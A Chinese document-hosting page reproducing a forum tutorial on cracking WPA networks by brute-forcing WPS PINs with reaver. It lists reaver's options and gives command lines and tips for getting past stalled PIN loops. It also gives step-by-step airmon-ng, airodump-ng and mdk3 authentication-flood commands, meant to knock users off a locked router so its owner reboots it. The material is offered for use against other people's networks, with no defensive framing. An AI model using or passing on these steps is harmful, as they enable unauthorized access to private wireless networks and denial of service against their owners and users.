PIN过程中出现的死循环解决方法与使用mdk3洪水攻击模式使用教程.docx
- 文档编号:4628899
- 上传时间:2022-12-07
- 格式:DOCX
- 页数:10
- 大小:958.91KB
PIN过程中出现的死循环解决方法与使用mdk3洪水攻击模式使用教程.docx
《PIN过程中出现的死循环解决方法与使用mdk3洪水攻击模式使用教程.docx》由会员分享,可在线阅读,更多相关《PIN过程中出现的死循环解决方法与使用mdk3洪水攻击模式使用教程.docx(10页珍藏版)》请在冰豆网上搜索。
PIN过程中出现的死循环解决方法与使用mdk3洪水攻击模式使用教程
破解WPA时,PIN出现死循环处理方法。
(吾就爱无线论坛)
如下面这个例子,一开始,或者破解一段时间后出来PIN无限循环:
(吾就爱无线论坛)
本人经过多次实验最后总结了解决的办法:
RequiredArguments:
-i,--interface=
网卡的监视接口,通常是mon0
-b,--bssid=
AP的MAC地址
(吾就爱无线论坛)
OptionalArguments:
-m,--mac=
指定本机MAC地址,在AP有MAC过滤的时候需要使用
-e,--essid=
路由器的ESSID,一般不用指定
-c,--channel=
信号的频道,如果不指定会自动扫描
-o,--out-file=
标准输出到文件
-s,--session=
恢复进程文件
-C,--exec=
pin成功后执行命令
-D,--daemonizeDaemonizereaver
设置reaver成Daemon
-a,--autoAutodetectthebestadvancedoptionsforthetargetAP
对目标AP自动检测高级参数
-f,--fixedDisablechannelhopping
禁止频道跳转
-5,--5ghzUse5GHz802.11channels
使用5G频道
-v,--verboseDisplaynon-criticalwarnings(-vvformore)
显示不重要警告信息-vv可以显示更多
-q,--quietOnlydisplaycriticalmessages
只显示关键信息
-h,--helpShowhelp
显示帮助
(吾就爱无线论坛)
AdvancedOptions:
-p,--pin=
直接读取psk(本人测试未成功,建议用网卡自带软件获取)
-d,--delay=
pin间延时,默认1秒,推荐设0
-l,--lock-delay=
AP锁定WPS后等待时间
-g,--max-attempts=
最大pin次数
-x,--fail-wait=
10次意外失败后等待时间,默认0秒
-r,--recurring-delay= y>Sleepforysecondseveryxpinattempts 每x次pin后等待y秒 -t,--timeout= 收包超时,默认5秒 -T,--m57-timeout= M5/M7超时,默认0.2秒 -A,--no-associateDonotassociatewiththeAP(associationmustbedonebyanotherapplication) 不连入AP(连入过程必须有其他程序完成) -N,--no-nacksDonotsendNACKmessageswhenoutoforderpacketsarereceived 不发送NACK信息(如果一直pin不动,可以尝试这个参数) -S,--dh-smallUsesmallDHkeystoimprovecrackspeed 使用小DH关键值提高速度(推荐使用) -L,--ignore-locksIgnorelockedstatereportedbythetargetAP 忽略目标AP报告的锁定状态 -E,--eap-terminateTerminateeachWPSsessionwithanEAPFAILpacket 每当收到EAP失败包就终止WPS进程 -n,--nackTargetAPalwayssendsaNACK[Auto] 对目标AP总是发送NACK,默认自动 -w,--win7MimicaWindows7registrar[False] 模拟win7注册,默认关闭 (吾就爱无线论坛) ------个人心得--------------------------------------------------------- 对一个ap刚开始pin的时候打开-vv参数,如果顺利,就中断,然后改成-v继续pin,反正进度是可以保存的 reaver-imon0-bxx: xx: xx: xx: xx: xx-d0-vv-a-S 如果一直pin不动,尝试加-N参数 reaver-imon0-bxx: xx: xx: xx: xx: xx-d0-vv-a-S–N (吾就爱无线论坛) AP洪水攻击 1、打气筒mdk3攻击模式操作方法 首先检测网卡: ifconfig-a 然后模拟端口: airmon-ngstartwlan0 接下来用: airodump-ngmon0 扫描ap找到你pin死的路由器mac 用mdk3做身份验证攻击 mdk3mon0a-amac(被pin死的路由器的mac) 身份验证攻击效果说明: 此攻击是针对无线AP的洪水攻击,又叫做身份验证攻击。 其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超过了无线AP所能承受的范围,AP就会自动断开现有链接,使合法用户无法使用无线网络。 迫使路由主人重启路由器。 说明: 此命令功能强大,使用错误会造成所有ap不能使用,请指定mac地址,然后使用,其余命令不要乱试。 你要使用此命令的其他参数,请详细阅读此命令参数详解 2、CDlinuxmdk3攻击模式操作方法 首先进入CDlinux,打开水滴或者打气筒搜索pin死的MAC地址(直接打开螃蟹或者3070驱动搜索无线MAC地址也OK)。 2012-8-3001: 31上传 下载附件(58.72KB) 然后点击左下角CDlnux图标,依次打开无线安全--------mdk3-v6 2012-8-3001: 31上传 下载附件(30.73KB) 进入mdk3后输入命令mdk3mon0a-a40: 16: 9F: **: 2C: B2(40: 16: 9F: **: 2C: B2为你pin死的路由的MAC,注意空格和大小写) 2012-8-3001: 31上传 下载附件(59.9KB) 回车后进入攻击模式,时间不要太长,最多半分钟就可以关闭对话框然后重新扫描网络看pin死的路由是不是已经不在了。 等待主人重启吧~~~ 非CDLinux可以在这里启动命令输入框 注意: 1、只有客户端在线时进行攻击才可能达到迫使重启目的,信号越强,效果越佳。 2、每次攻击最好不超5min,否则卡死(看机器配置),稍停1min在进行攻击,连续攻击三次应该就可以了! 8C210Apin重码或者pin死路由器的解决办法(我验证貌似有效) 看看我重码拼死后,的时候 2012-9-1803: 02上传 下载附件(32.01KB) 拼死路由器后,整整一晚上没有在找到这个信号,今天起床在看,发现又出来了,继续拼,发现,重码非常非常的严重,今天中午放弃N次,今晚在小试一下,加了参数后,大减少重码,坚持就是胜利,往下看。 2012-9-1803: 02上传 下载附件(16.8KB) 2012-9-1803: 02上传 下载附件(15.99KB) 看到了吧,重码,不过,是偶偶的了,加了参数后,不会像昨天和今天上午那样,一直重码一个码不动了.在往下看,奇迹出现了。 2012-9-1803: 03上传下载附件(17.99KB)2012-1-2513: 18上传 下载次数: 2 Pin码重复出现死循环解决办法 1.xiaopanOS环境解决之道: 当你看到PIN到一定程度,窗口里的PIN码不变、进度百分比也不走,那么,保持原窗口不变,再点击ROOTSHELL图标,新开一个PIN窗口,输入reaver-imon0-b正在PIN的MAC-a-s-vv(注意: 这里“S”要小写)那么,你就会发现原来PIN的窗口,PIN码开始改变,进度开始前进了! 而且PIN的时间也大为缩短了! 如果是PJ到99.99%,执行此部操作就马上弹出正确的pin码和wifi密码,以及路由器的SSID PIN码和密码。 2012-10-502: 48上传 pin过程中解决90.9%和99.9%死循环的实践,证明非常有效。 pin到90.9%死循环,说明前四位已经pin完,但是没出;原因大概就是AP没发出确认信息,reaver就已经跳过了,从而错过了正确前四位的确认。 pin到99.9%死循环,说明后四位的前三已经跑完,但是没出。 原因同上。 经过实践,已经找到原因所在, 论坛里的方法,大概MAC后跟的后缀都是-vv-a-S,然而,殊不知,这样的后缀虽然可以加快速度,但是,也有可能会错过正确前四等的确认。 所以,不放过每一次确认信息的表达式是 reaver-imon0-bMAC-v-a-n,其他的就不用了。 还可以加一个-c。 基本从我遇到90.9%和99.9%的死循环的实践来看,已经100%成功了。 下载附件(66.21KB)
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- PIN 过程 出现 循环 解决方法 使用 mdk3 洪水 攻击 模式 教程